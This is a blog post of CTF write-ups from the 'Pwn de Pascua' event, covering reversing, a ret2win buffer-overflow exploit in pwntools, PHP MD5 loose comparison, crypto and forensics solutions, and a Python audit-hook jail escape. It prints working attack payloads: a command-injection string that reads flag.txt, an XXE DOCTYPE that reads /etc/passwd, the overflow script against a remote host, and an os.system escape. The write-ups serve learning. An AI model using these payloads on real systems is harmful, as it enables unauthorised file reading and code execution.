PWN de Pascua Writeups

Posted on 7 mins

Pwn Forensics Crypto Jail

Table of Contents

In this post I will share the solutions to the challenges I solved in the “Pwn de pascua” CTF, played on December 20, 2024. I am pleased to announce that I got the first place in this event, which fills me with satisfaction and motivation.

Below, I will explain the approaches and techniques I used to solve each of the challenges presented.

principiante

AprendeRE

We are given a binary that we must reverse, analyzing its functions we see that the function check_password() performs an xor with the string wl]qkorng]PG##=#, by performing the reverse we can get the password and solve the challenge.

target = "wl]qkorng]PG##=#"
password = ''.join(chr(ord(char) ^ 2) for char in target)
print(password)

When we execute it we obtain the password that corresponds to the flag.

$ python3 solve.py
un_simple_RE!!?!

ret2pwn

This challenge is the typical ret2win challenge, we are given a binary vulnerable to Buffer Overflow with a win() function which returns a shell. The binary in its main() function calls the vuln() function.

gef➤  disass main
Dump of assembler code for function main:
   0x0000000000401240 <+0>:	endbr64
   0x0000000000401244 <+4>:	push   rbp
   0x0000000000401245 <+5>:	mov    rbp,rsp
   0x0000000000401248 <+8>:	mov    eax,0x0
   0x000000000040124d <+13>:	call   0x401196 <setup>
   0x0000000000401252 <+18>:	mov    eax,0x0
   0x0000000000401257 <+23>:	call   0x4011f7 <vuln>
   0x000000000040125c <+28>:	mov    eax,0x0
   0x0000000000401261 <+33>:	pop    rbp
   0x0000000000401262 <+34>:	ret
End of assembler dump.

The vuln() function is vulnerable to Buffer Overflow since it defines a buffer of 256 bytes in size and reads up to 512 bytes, giving us room to overflow the stack.

gef➤  disass vuln
Dump of assembler code for function vuln:
   0x00000000004011f7 <+0>:	endbr64
   0x00000000004011fb <+4>:	push   rbp
   0x00000000004011fc <+5>:	mov    rbp,rsp
   0x00000000004011ff <+8>:	sub    rsp,0x100
   0x0000000000401206 <+15>:	lea    rax,[rip+0xdff]        # 0x40200c
   0x000000000040120d <+22>:	mov    rdi,rax
   0x0000000000401210 <+25>:	call   0x401070 <puts@plt>
   0x0000000000401215 <+30>:	lea    rax,[rbp-0x100]
   0x000000000040121c <+37>:	mov    edx,0x200
   0x0000000000401221 <+42>:	mov    rsi,rax
   0x0000000000401224 <+45>:	mov    edi,0x0
   0x0000000000401229 <+50>:	call   0x401090 <read@plt>
   0x000000000040122e <+55>:	lea    rax,[rip+0xde3]        # 0x402018
   0x0000000000401235 <+62>:	mov    rdi,rax
   0x0000000000401238 <+65>:	call   0x401070 <puts@plt>
   0x000000000040123d <+70>:	nop
   0x000000000040123e <+71>:	leave
   0x000000000040123f <+72>:	ret
End of assembler dump.

To sum up:

With this exploit we solve the challenge.

from pwn import *


p = remote('0.cloud.chals.io', 23438)


offset = 264
junk = b'A' * offset

payload = junk                          # padding
payload += p64(0x000000000040101a)      # ret
payload += p64(0x00000000004011dd)      # win()

p.sendline(payload)
p.interactive()

When executed, it returns a shell.

$ python3 solve.py 
[+] Opening connection to 0.cloud.chals.io on port 23438: Done
[*] Switching to interactive mode
A donde? : 

ok, let's go!

$ ls
flag.txt
ret2pwn
$ cat flag.txt
q4{un_simple_ret2pwn_para_apr3nder!}

Just Decode it!

We are given a string encoded in base64, we decode it and see that it is in hexadecimal, decode it again and get the flag, use Cyberchef for this.

Borrado

The description of the challenge is as follows.

Anoche me tome unos tragos y quede borrado, ayudame a recuperar mi memoria.

Si quieres aprender a resolver retos de tipo Forense, este challenge es un buen comienzo para ti!

We are given an .img and when doing a strings you can see the flag.

$ strings challenge.img
...
...
...
q4{l0_borrado_nunca_esta_borrado}

Alive

Web challenge, command injection with the typical ;+cat+/flag.txt.

web

Al choque!

We were given the source code of the application.

<?php
include("flag.php");
if (isset($_GET['secret'])) {
    
    if (md5($_GET['secret']) == '0e830400451993494058024219903391') {
        print($flag);
        exit;
    }
    } else {
        print("No hay flags aca!");
        exit;
    }
?>

We see that it includes the file flag.php which contains the flag, then with an if statement it validates if the secret that we enter encrypted to MD5 is equal to 0e830400451993494058024219903391, if this is fulfilled it returns the flag, if not it gives us an error. Searching in Google I realized that the hash 0e83040045451993494058024219903391 was the string QNKCDZO, so with that I could solve the challenge.

$ curl -X GET https://q4-alchoque.chals.io/\?secret\=QNKCDZO
q4{super_f4c1l_gg_compar1s0n_webwebweb}

El_Fr33st4lero

This challenge was one of the ones I liked the most! I spent a lot of time trying to solve it.

When entering we could see a video of the glorious Matiah Chinaski rapping, when we saw the source code we saw a string that caught my attention //cat, also the video was called cat.mp4 so I felt it had to do something with animals. Since I did not find anything I decided to do fuzzing using wfuzz with animal names and extensions, with this command I found the file gato.html.

wfuzz -c -t 50 -u https://q4-el-fr33st4lero.chals.io/FUZZFUZ2Z -z file,animales.txt -z file,File-Extensions-Wordlist.txt --hc=404,403

When entering the file we saw a registration form.

When filling the form and intercepting the request we see that the data is processed in XML, I automatically knew that this was an XXE so I injected the typical DOCTYPE and I could read files.

<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

Then I was wasting a lot of time looking for the flag, until it occurred to me to look in /etc/ and sure enough, there it was!

crypto

babycrypto

We receive the encrypted flag and the source code that encrypts it.

from flag import FLAG

def enc(plaintext):
    message = ""
    for i, char in enumerate(plaintext):
        if char.isalpha():
            if char.isupper():
                shifted = (ord(char) - ord('A') + i) % 26
                message += chr(shifted + ord('A'))
            elif char.islower():
                shifted = (ord(char) - ord('a') + i) % 26
                message += chr(shifted + ord('a'))
        else:
            message += char
    return message

message = enc(FLAG)

# Write the encrypted FLAG to an output file
with open("message.txt", "w") as f:
    f.write(message)

Define an enc() function which encrypts the message using the typical cesar modulo 26 cipher, just write the inverse and the challenge can be solved.

def dec(ciphertext):
    plaintext = ""
    for i, char in enumerate(ciphertext):
        if char.isalpha():
            if char.isupper():
                shifted = (ord(char) - ord('A') - i) % 26
                plaintext += chr(shifted + ord('A'))
            elif char.islower():
                shifted = (ord(char) - ord('a') - i) % 26
                plaintext += chr(shifted + ord('a'))
        else:
            plaintext += char
    return plaintext


ciphertext = "uo_vq4rs_lbjbgc_frjt_knbnzrbt_IQ_WXAYIUZC_G4"
flag = dec(ciphertext)
print(flag)

When we executed it, we obtained the flag in plain text.

$ python3 solve.py 
un_sm4ll_crypto_para_preparar_EL_PPROXIMO_Q4

miniCrypto

This challenge was a vulnerable RSA implementation, since the prime number $q$ was generated in an insecure way and this allowed that by means of Fermat Factorization we could factor $n$ and break the whole cryptosystem. This is the implementation of Fermat Factorization in Python.

def isqrt(n):
    x=n
    y=(x+n//x)//2
    while(y<x):
        x=y
        y=(x+n//x)//2
    return x
def fermat(n):
    t0=isqrt(n)+1
    counter=0
    t=t0+counter
    temp=isqrt((t*t)-n)
    while((temp*temp)!=((t*t)-n)):
        counter+=1
        t=t0+counter
        temp=isqrt((t*t)-n)
    s=temp
    p=t+s
    q=t-s
    return p,q

When factoring $n$ it is only necessary to do the typical RSA calculations.

from Crypto.Util.number import *

p = 113297151305912403070580180537218896504689162129151290963870792347548172274828888439339824771092686949516048337709550681895700696862849235103504416930344176272766719097558351724788814246272788549027204516072535618493595756759403872850117463642792662718160145892009731606452724621231186976959981900308189755531

q = 113297151305912403070580180537218896504689162129151290963870792347548172274828888439339824771092686949516048337709550681895700696862849235103504416930344176272766719097558351724788814246272788549027204516072535618493595756759403872850117463642792662718160145892009731606452724621231186976959981900308189754997

n = p * q
e = 0x10001
phi = (p - 1) * (q - 1)
d = inverse(e, phi)

c = 5335936758885879161423355433081046977912425604704954839255728437814818873543632243485494529752176442064203990160911227421739792500178816177216549939700777698916632547957216674152445717172056741243350986611526570455601290091805437221084166967459773081949268202098903185602329736955728542606518569949940633898118323531851517214467309180041904779619873830149073108642740979827115326295272452191775356208119968967436215978408766348998795622791084227177086770364385580014851638733205723845107102103568366094363255217187381857921576152404851953222136602770299643709048596667087952242391567864632554494747483290981146671513

print(long_to_bytes(pow(c, d, n)))

When we execute it we obtain the flag.

$ python3 solve2.py 
b'q4{un_p0c0_s0l0_un_p0c0_de_RSA!}'

forense

Volando

We get a .mem file, using volatily3 we dumpe the processes and we see that there is a string in hexadecimal, we decode it and get the flag.

$ python vol.py -f ../q4/memdump.mem windows.cmdline

7456    smartscreen.ex  C:\Windows\System32\smartscreen.exe -Embedding
6448    q4_mal.exe      "C:\Users\user01\Desktop\q4_mal.exe"
6452    conhost.exe     ??\C:\Windows\system32\conhost.exe 0x4
4812    71347B616C676F  "C:\Users\user01\Documents\71347B616C676F5F616E616C317331735F703472345F656C5F6D656D64756D707D.exe"

8136    SearchProtocol  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
5608    SearchFilterHo  "C:\Windows\system32\SearchFilterHost.exe" 0 828 832 840 8192 836 820

>>> bytes.fromhex("71347B616C676F5F616E616C317331735F703472345F656C5F6D656D64756D707D")
b'q4{algo_anal1s1s_p4r4_el_memdump}'

jail

La Cana

We must escape from a Python jail, it gives us the source code and the remote instance to connect to.

#!/usr/bin/env python3
import sys

def check(n, a):
    if n not in ["exec", "compile", "builtins.input", "builtins.input/result"]:
        print(f"nah! {n} y {a} prohibidos!")
        print("Chao no mas!")
        exit(0)

sys.addaudithook(check)

while True:
    try:
        c = input("> ")
        exec(c)
    except Exception as e:
        print("Error!")
        exit(0)

The source code looked familiar to me since I had solved a similar challenge in ImaginaryCTF some time ago, but the strange thing is that the payload didn’t work because the exit() function of Python gave me an error, looking for it I found this https://spclr.ch/imaginaryctf-round-11-writeup and I could solve the challenge.

nc 0.cloud.chals.io 32199
> exit=lambda x: x
> import os
> os.system("cat flag.txt")
q4{3scape_de_la_carcel_de_la_vibor4}
nah! os.system y (b'cat flag.txt',) prohibidos!
Chao no mas!

In closing, I want to emphasize that the CTF challenges were excellent and I really enjoyed the experience. I am very satisfied with the level of difficulty and the quality of the challenges. I am certainly looking forward to the next Q4 in March.